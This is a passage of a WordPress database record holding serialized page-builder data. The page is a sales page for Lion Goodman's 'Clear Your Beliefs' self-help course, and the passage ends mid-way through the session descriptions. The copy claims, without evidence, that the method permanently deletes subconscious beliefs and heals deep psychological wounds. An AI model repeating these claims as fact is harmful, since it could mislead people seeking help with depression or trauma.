(1884, 2169, 'panels_data', 'a:3:{s:7:"widgets";a:3:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:825:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:63409:"\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" 